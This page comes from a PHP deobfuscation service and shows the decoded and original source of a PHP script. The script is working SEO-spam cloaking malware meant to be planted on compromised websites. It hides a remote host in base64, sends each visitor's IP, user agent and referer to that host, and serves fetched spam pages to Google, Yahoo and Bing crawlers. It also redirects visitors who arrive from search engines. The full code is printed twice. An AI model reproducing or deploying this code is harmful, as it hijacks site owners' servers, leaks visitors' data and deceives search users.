Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ob_clean();@ob_end_clean();@ob_start();@ignore_user_abort(true);@set_time_limit(0);..

Decoded Output download

<?php  ob_clean();@ob_end_clean();@ob_start();@ignore_user_abort(true);@set_time_limit(0);@ini_set("html_errors", "0");error_reporting(0);$g = urlencode('sm_154_fgj_300w');$do = base64_decode('bW0yLTIuY29sZGhpcmUudG9w');$l = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE'] ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '');$ua = urlencode($_SERVER['HTTP_USER_AGENT'] ? $_SERVER['HTTP_USER_AGENT'] : '');$sn = ($_SERVER['SCRIPT_NAME'] ? $_SERVER['SCRIPT_NAME'] : '/index.php');$hr = urlencode($_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : '');$i = urlencode(gia());if (stripos($_SERVER['SERVER_SOFTWARE'], 'apache') !== false) {$s = 'apache';if ($sn == '/index.php') {$wjt = (_wp() == true) ? '/' : '?';} else {$wjt = '?';}} else {$wjt = '?';$s = "other";}if (($_SERVER['REQUEST_URI'] == "/" || $_SERVER['REQUEST_URI'] == '/index.php') && $_SERVER['QUERY_STRING'] == "") {$base = bu() . $sn . $wjt;$u = $base . 'index/b' . dpid($base) . '.html';} else {if ($sn == '/index.php') {$base = bu() . $wjt;$u = $base . $_SERVER['REQUEST_URI'];} else {$base = bu() . $sn . $wjt;if ($_SERVER['QUERY_STRING'] == "") {$u = $base . 'item/s' . dpid($base) . '.html';} else {$u = $base . $_SERVER['QUERY_STRING'];}}}$w = "http://" . $do . "/v93?i=" . $i . "&l=" . $l . "&u=" . urlencode($u) . "&g=" . $g . "&s=" . $s . "&ua=" . $ua . "&hr=" . $hr;$html = zge($w);$html = str_replace('#domain#', $base, $html);if (stripos($u, base64_decode('cm9ib3RzLnR4dA==')) !== false) {header('Content-Type: text/plain;charset=utf-8');echo $html;exit(0);} elseif (md5(substr($u, -4)) == '4e9f6c7fdef327a6b0e08505dc57a694' && stripos($u, base64_decode('cGluZ3NpdGVtYXAueG1s')) === false) {header('Content-type:application/xml; charset=UTF-8');echo $html;exit(0);} elseif (stripos($u, base64_decode('c2l0ZW1hcHRlc3R6cWRlbW9wYWdl').$g) !== false) {header('HTTP/1.1 404 Not Found');echo $html;exit(0);} elseif (stripos($u, base64_decode('c2l0ZW1hcHBpbmc=').$g) !== false || stripos($u, base64_decode('cGluZ3NpdGVtYXAueG1s')) !== false) {header('Content-type:text/html; charset=UTF-8');$a = unserialize($html);foreach ($a as $b) {$r = gget($b);preg_match("/<h2>(.+)?<\/h2>/", $r, $matches);echo $b . "==> <b>" . $matches[1] . "</b><br/>" . PHP_EOL;}exit(0);} elseif (strpos($u,base64_decode('c3R5bGUueHNs'))!==false){header('Content-type:application/xml; charset=UTF-8');echo $html;exit(0);} else {header('Content-type:text/html; charset=UTF-8');}if (strpos($html, 'f9fcbc9df933b51c280e4d69988c3f07') !== false) {ob_clean();@ob_end_clean();$html = str_replace('f9fcbc9df933b51c280e4d69988c3f07', '', $html);header('Location: ' . $html);}if (ags($ua) && $sn == '/index.php') {echo $html;exit();} elseif ($sn != '/index.php') {echo $html;exit();}if (rjp($hr)) {echo $html;exit();}function _wp(){$dr = $_SERVER['DOCUMENT_ROOT'];if (is_dir($dr . "/wp-admin/") && is_file($dr . '/wp-config.php') && is_dir($dr . '/wp-includes/') && is_file($dr . '/wp-blog-header.php') && is_dir($dr . '/wp-content/') && is_file($dr . '/.htaccess')) {return true;} else {return false;}}function gget($url){$contents = @file_get_contents($url);if (!$contents) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$contents = curl_exec($ch);curl_close($ch);}return $contents;}function zge($url, $t = 50){$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_AUTOREFERER, true);if (stripos($url, 'https') !== false) {curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);}curl_setopt($curl, CURLOPT_TIMEOUT, $t);$content = curl_exec($curl);curl_close($curl);return $content;}function gia(){if (isset($_SERVER)) {if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {$ip = $_SERVER['HTTP_X_FORWARDED'];} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {$ip = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED'])) {$ip = $_SERVER['HTTP_FORWARDED'];} else {$ip = $_SERVER['REMOTE_ADDR'];}} else {if (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');} elseif (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');} else {$ip = getenv('REMOTE_ADDR');}}return trim($ip);}function bu(){if ((isset($_SERVER['HTTPS']) && (($_SERVER['HTTPS'] == 'on') || ($_SERVER['HTTPS'] == '1'))) || (isset($_SERVER['HTTPS']) && (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443))) {$http = 'https://' . $_SERVER['HTTP_HOST'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' || !empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') {$http = 'https://' . $_SERVER['HTTP_HOST'];} else {$http = 'http://' . $_SERVER['HTTP_HOST'];}return $http;}function dpid($domain, $len = 4){$i = 0;$pid = 1;while ($i < strlen($domain)) {$pid += ord(substr($domain, $i, 1));$i++;}while (strlen($pid) < $len) {$pid = (int)$pid . '0';}if (strlen($pid) > $len) $pid = substr($pid, 0, $len);return (string)$pid;}function ags($agent){$show = false;$agent = str_replace(' ', '', $agent);$agent = strtolower($agent);if (!$agent || $agent == "" || empty($agent)) {return false;}$agent_array = array('googlebot', 'yahoo! slurp', 'yahoo slurp', 'google adsense', 'google', 'yahoo', 'bing', 'bingbot');foreach ($agent_array as $ag) {$ag = strtolower($ag);$ag = str_replace(' ', '', $ag);if (stripos($agent, trim($ag)) !== false) {$show = true;break;}}return $show;}function rjp($referer){$jump = false;$referer = strtolower($referer);if (!$referer || $referer == "" || empty($referer)) {return false;}$referer_array = array('google.co.jp', 'google.com', 'yahoo.co.jp', 'yahoo.com', 'bing.com');foreach ($referer_array as $rf) {if (stripos($referer, trim($rf)) !== false) {$jump = true;break;}}return $jump;} ?>

Did this file decode correctly?

Original Code

<?php  ob_clean();@ob_end_clean();@ob_start();@ignore_user_abort(true);@set_time_limit(0);@ini_set("html_errors", "0");error_reporting(0);$g = urlencode('sm_154_fgj_300w');$do = base64_decode('bW0yLTIuY29sZGhpcmUudG9w');$l = urlencode($_SERVER['HTTP_ACCEPT_LANGUAGE'] ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '');$ua = urlencode($_SERVER['HTTP_USER_AGENT'] ? $_SERVER['HTTP_USER_AGENT'] : '');$sn = ($_SERVER['SCRIPT_NAME'] ? $_SERVER['SCRIPT_NAME'] : '/index.php');$hr = urlencode($_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : '');$i = urlencode(gia());if (stripos($_SERVER['SERVER_SOFTWARE'], 'apache') !== false) {$s = 'apache';if ($sn == '/index.php') {$wjt = (_wp() == true) ? '/' : '?';} else {$wjt = '?';}} else {$wjt = '?';$s = "other";}if (($_SERVER['REQUEST_URI'] == "/" || $_SERVER['REQUEST_URI'] == '/index.php') && $_SERVER['QUERY_STRING'] == "") {$base = bu() . $sn . $wjt;$u = $base . 'index/b' . dpid($base) . '.html';} else {if ($sn == '/index.php') {$base = bu() . $wjt;$u = $base . $_SERVER['REQUEST_URI'];} else {$base = bu() . $sn . $wjt;if ($_SERVER['QUERY_STRING'] == "") {$u = $base . 'item/s' . dpid($base) . '.html';} else {$u = $base . $_SERVER['QUERY_STRING'];}}}$w = "http://" . $do . "/v93?i=" . $i . "&l=" . $l . "&u=" . urlencode($u) . "&g=" . $g . "&s=" . $s . "&ua=" . $ua . "&hr=" . $hr;$html = zge($w);$html = str_replace('#domain#', $base, $html);if (stripos($u, base64_decode('cm9ib3RzLnR4dA==')) !== false) {header('Content-Type: text/plain;charset=utf-8');echo $html;exit(0);} elseif (md5(substr($u, -4)) == '4e9f6c7fdef327a6b0e08505dc57a694' && stripos($u, base64_decode('cGluZ3NpdGVtYXAueG1s')) === false) {header('Content-type:application/xml; charset=UTF-8');echo $html;exit(0);} elseif (stripos($u, base64_decode('c2l0ZW1hcHRlc3R6cWRlbW9wYWdl').$g) !== false) {header('HTTP/1.1 404 Not Found');echo $html;exit(0);} elseif (stripos($u, base64_decode('c2l0ZW1hcHBpbmc=').$g) !== false || stripos($u, base64_decode('cGluZ3NpdGVtYXAueG1s')) !== false) {header('Content-type:text/html; charset=UTF-8');$a = unserialize($html);foreach ($a as $b) {$r = gget($b);preg_match("/<h2>(.+)?<\/h2>/", $r, $matches);echo $b . "==> <b>" . $matches[1] . "</b><br/>" . PHP_EOL;}exit(0);} elseif (strpos($u,base64_decode('c3R5bGUueHNs'))!==false){header('Content-type:application/xml; charset=UTF-8');echo $html;exit(0);} else {header('Content-type:text/html; charset=UTF-8');}if (strpos($html, 'f9fcbc9df933b51c280e4d69988c3f07') !== false) {ob_clean();@ob_end_clean();$html = str_replace('f9fcbc9df933b51c280e4d69988c3f07', '', $html);header('Location: ' . $html);}if (ags($ua) && $sn == '/index.php') {echo $html;exit();} elseif ($sn != '/index.php') {echo $html;exit();}if (rjp($hr)) {echo $html;exit();}function _wp(){$dr = $_SERVER['DOCUMENT_ROOT'];if (is_dir($dr . "/wp-admin/") && is_file($dr . '/wp-config.php') && is_dir($dr . '/wp-includes/') && is_file($dr . '/wp-blog-header.php') && is_dir($dr . '/wp-content/') && is_file($dr . '/.htaccess')) {return true;} else {return false;}}function gget($url){$contents = @file_get_contents($url);if (!$contents) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$contents = curl_exec($ch);curl_close($ch);}return $contents;}function zge($url, $t = 50){$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_HEADER, 0);curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate');curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_AUTOREFERER, true);if (stripos($url, 'https') !== false) {curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);}curl_setopt($curl, CURLOPT_TIMEOUT, $t);$content = curl_exec($curl);curl_close($curl);return $content;}function gia(){if (isset($_SERVER)) {if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {$ip = $_SERVER['HTTP_X_FORWARDED'];} elseif (isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP'])) {$ip = $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {$ip = $_SERVER['HTTP_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED'])) {$ip = $_SERVER['HTTP_FORWARDED'];} else {$ip = $_SERVER['REMOTE_ADDR'];}} else {if (getenv('HTTP_X_FORWARDED_FOR')) {$ip = getenv('HTTP_X_FORWARDED_FOR');} elseif (getenv('HTTP_CLIENT_IP')) {$ip = getenv('HTTP_CLIENT_IP');} else {$ip = getenv('REMOTE_ADDR');}}return trim($ip);}function bu(){if ((isset($_SERVER['HTTPS']) && (($_SERVER['HTTPS'] == 'on') || ($_SERVER['HTTPS'] == '1'))) || (isset($_SERVER['HTTPS']) && (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443))) {$http = 'https://' . $_SERVER['HTTP_HOST'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' || !empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') {$http = 'https://' . $_SERVER['HTTP_HOST'];} else {$http = 'http://' . $_SERVER['HTTP_HOST'];}return $http;}function dpid($domain, $len = 4){$i = 0;$pid = 1;while ($i < strlen($domain)) {$pid += ord(substr($domain, $i, 1));$i++;}while (strlen($pid) < $len) {$pid = (int)$pid . '0';}if (strlen($pid) > $len) $pid = substr($pid, 0, $len);return (string)$pid;}function ags($agent){$show = false;$agent = str_replace(' ', '', $agent);$agent = strtolower($agent);if (!$agent || $agent == "" || empty($agent)) {return false;}$agent_array = array('googlebot', 'yahoo! slurp', 'yahoo slurp', 'google adsense', 'google', 'yahoo', 'bing', 'bingbot');foreach ($agent_array as $ag) {$ag = strtolower($ag);$ag = str_replace(' ', '', $ag);if (stripos($agent, trim($ag)) !== false) {$show = true;break;}}return $show;}function rjp($referer){$jump = false;$referer = strtolower($referer);if (!$referer || $referer == "" || empty($referer)) {return false;}$referer_array = array('google.co.jp', 'google.com', 'yahoo.co.jp', 'yahoo.com', 'bing.com');foreach ($referer_array as $rf) {if (stripos($referer, trim($rf)) !== false) {$jump = true;break;}}return $jump;} ?>

Function Calls

ob_clean 1

Variables

None

Stats

MD5 91f98e0586cd376ee6028c61983a1236
Eval Count 0
Decode Time 91 ms